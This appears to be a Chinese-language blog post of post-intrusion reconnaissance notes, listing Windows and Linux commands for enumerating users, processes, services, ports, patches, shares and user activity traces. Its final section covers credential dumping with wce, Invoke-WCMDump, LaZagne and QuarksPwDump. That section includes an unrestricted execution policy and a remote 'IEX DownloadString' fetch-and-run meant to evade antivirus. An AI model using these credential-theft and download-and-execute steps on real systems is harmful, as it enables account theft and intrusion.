1.查看用户信息
Windows命令net user,Linux命令cat /etc/passwd
2.查看进程信息
Windows命令tasklist,可以taskkill /pid 进程号 /f关闭对应进程
Linux命令ps aux或者top,强制终止进程kill -9 进程号。
3.查看服务类别
Windows命令net start
Linux命令chkconfig –list或者service –status-all
4.查看端口
Windows命令netstat -ano
Linux命令netstat -anptul,ps -aux过滤查看
5.补丁列表
Windows命令wmic qfe list full
Linux命令:uname -a查看版本号,rpm -qa查看源安装情况,再使用grep过滤一下。
6.共享
Windows 查看共享连接用 net use
查看本机共享用 net share
查看共享主机用 net view
df命令用来查看系统的space和inode使用情况,也是常用命令之一
-a 显示所有的文件系统,包括本地的和挂载的网络文件系统
-h 显示大小的时候,以人性化的方式来显示,以更适合的方式来显示
-T 现实文件系统类型
-t 显示指定的文件系统
-l 只显示本地文件系统
-k 以KB为单位显示
-x 不显示指定的文件系统
-i 显示inode使用情况
7.本地用户习惯
c:\windows\SchedLgU.txt,如果未启动Remote Storage Engine服务和Task Scheduler 服务,则不会做任何记录
C:\WINDOWS\Prefetch 文件夹,里面有记录用户曾经运行过什么程序,文件最前面的即为程序名
C:\Users\用户名\Recent 文件夹,xp及server03的是C:\Documents and Settings\用户名\Recent 文件夹,记录了最近打开过的文件和文件夹
8. 当前用户密码
wce.exe软件获取本地hash值
利用powershell,将脚本Ivoke-WCMDump.ps1注入powershell,
命令Import-Module .\Invoke-WCMDump.ps1,注入成功后执行
Invoke-WCMDump会显示登陆过的凭证,也就是账号密码。当然前
提是必须要配置powershell的策略,查看当前策略命令
Get-ExecutionPolicy,改变策略Set- ExecutionPolicy Unrestricted
然后才注入脚本Invoke-WCMDump.ps1。因为有杀毒软件会导致上
传的脚本报毒,那么使用远程下载,使用cmd运行命令powershell.exe
“IEX (New-Object Net.WebClient).DownloadString(‘脚本地址’);Invoke-WCMDump”
lazagne.exe提权第三应用的账号密码,只能在python环境下使用,
可以使用-h查询对应命令,browsers可以查询对应网站的账号密码
QuarksPwDump_v0.1获取hash值
QuarksPwDump --dump-hash-local
扫一扫
189
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
